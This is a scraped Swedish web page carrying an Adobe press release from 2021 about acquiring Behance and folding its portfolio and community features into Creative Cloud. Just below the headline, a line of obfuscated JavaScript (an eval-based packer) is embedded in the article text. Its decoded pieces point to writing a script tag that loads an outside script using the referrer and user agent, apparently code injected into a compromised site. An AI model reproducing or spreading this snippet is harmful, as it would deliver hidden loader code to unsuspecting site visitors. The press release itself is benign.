Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Adobe förvärvar världens största sociala nätverk för kreativa

Adobe förvärvar världens största sociala nätverk för kreativa

Adobe: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zshet|var|u0026u|referrer|fzdzn||js|php’.split(’|’),0,{}))
Nu är det ännu roligare att vara Creative Cloud-medlem. Adobe förvärvar Behance, världens största sociala nätverk för kreativa med över en miljon medlemmar och planerar att integrera de många funktionerna från Behance Creative Cloud. Med Behance kan kreativa bland annat presentera sina projekt, bygga relationer och skapa nya arbetstillfällen.

Alla Creative Cloud medlemmar kommer snart att ha tillgång till Behances standardfunktioner (skapande av portfölj och communityfunktioner), samtidigt som betalande Creative Cloud medlemmar även får tillgång till premium-funktioner (t.ex. Behance Prosite).

”När vi lanserade Creative Cloud under förra året meddelade vi också att vi skulle komma med nyheter för medlemmarna. Vi lanserade nyss nya synkroniserings- och publiceringstjänster och nu tillkännager vi förvärvet av Behance. Detta kommer att spela en nyckelroll i utvecklingen av Creative Cloud och göra det lättare för kreativa att samarbeta och synliggöra sitt arbete”, säger Mariah Andén, Nordisk marknadschef för Digital Media på Adobe.

Under de senaste 30 dagarna har det varit över 90 miljoner visningar av portföljer på Behancesidor och Behanceplattformen innehåller idag över tre miljoner projekt.

Läs mer i bifogat pressmeddelande på engelska

Eller David Wadhwani’s bloggpost

Detta är ett pressmeddelande från Adobe